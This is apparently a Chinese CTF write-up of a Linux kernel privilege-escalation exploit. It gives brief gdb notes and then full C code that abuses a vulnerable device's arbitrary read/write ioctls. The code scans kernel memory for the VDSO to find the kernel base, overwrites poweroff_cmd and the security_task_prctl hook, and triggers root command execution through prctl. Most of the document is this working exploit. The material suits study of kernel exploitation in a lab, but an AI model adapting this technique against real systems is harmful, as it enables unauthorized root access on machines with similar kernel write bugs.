prctl函数: 用户态函数,可用于定制进程参数,非常适合和内核进行交互
poweroff_work_func函数: 内核函数,执行 run_cmd(poweroff_cmd),即root权限执行poweroff_cmd
gdb调试内核并在security_task_prctl函数处下断点,用户态程序执行prctl函数,进入security_task_prctl函数,单步执行汇编指令,通过内存查看hook.task_prctl 地址
gdb 执行 p poweroff_cmd,获得poweroff_cmd真实地址
#define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> #include <sys/ioctl.h> #include <sys/auxv.h> #include <sys/prctl.h> #define CHANGE_POINT 0x100000 #define RW_READ 0x100001 #define RW_WRITE 0x100002 #define SET_MEM 0X100003 size_t poweroff_cmd = 0; size_t prctl_hook = 0; size_t poweroff_work_func = 0; size_t vmlinux_base = 0; struct vunl { char *point; size_t size; } VUNL; void leak_data(int fd, char *buf) { char *res = NULL; VUNL.size = 0x1000; for (size_t addr = 0xffffffff80000000; addr < 0xffffffffffffffff; addr += 0x1000) { VUNL.point = (char *)addr; ioctl(fd, CHANGE_POINT, &VUNL); //change the point ioctl(fd, RW_READ, buf); if (!strcmp("gettimeofday", buf + 0x2b5)) { printf("[+] the addr of VDSO is: 0x%lx\n", addr); vmlinux_base = addr & 0xffffffffff000000; printf("[+] the addr of vmlinux base is: 0x%lx\n", vmlinux_base); break; } puts("[-] not found, try again!\n"); } return; } int main(int argc, char *argv[]) { int fd = 0; char *buf = malloc(0x1000); char cmd[] = "/bin/chmod 777 /flag\x00"; fd = open("/dev/rw_any_dev", O_RDWR); leak_data(fd, buf); poweroff_cmd = vmlinux_base + 0xe3e1a0; prctl_hook = vmlinux_base + 0xe81078; poweroff_work_func = vmlinux_base + 0x075480; printf("[+] the addr of poweroff_cmd is: 0x%lx\n", poweroff_cmd); printf("[+] the addr of prctl hook is: 0x%lx\n", prctl_hook); printf("[+] the addr of orderly_poweroff is: 0x%lx\n", poweroff_work_func); VUNL.size = strlen(cmd)+1; // VUNL.size = strlen(argv[1])+1; VUNL.point = (char *)poweroff_cmd; ioctl(fd, CHANGE_POINT, &VUNL); ioctl(fd, RW_WRITE, cmd); // ioctl(fd, RW_WRITE, argv[1]); VUNL.size = 8; VUNL.point = (char *)prctl_hook; ioctl(fd, CHANGE_POINT, &VUNL); ioctl(fd, RW_WRITE, &poweroff_work_func); puts("[+] the cmd arg must have an ansolute_address"); prctl(PR_GET_NAME, "test"); return 0; }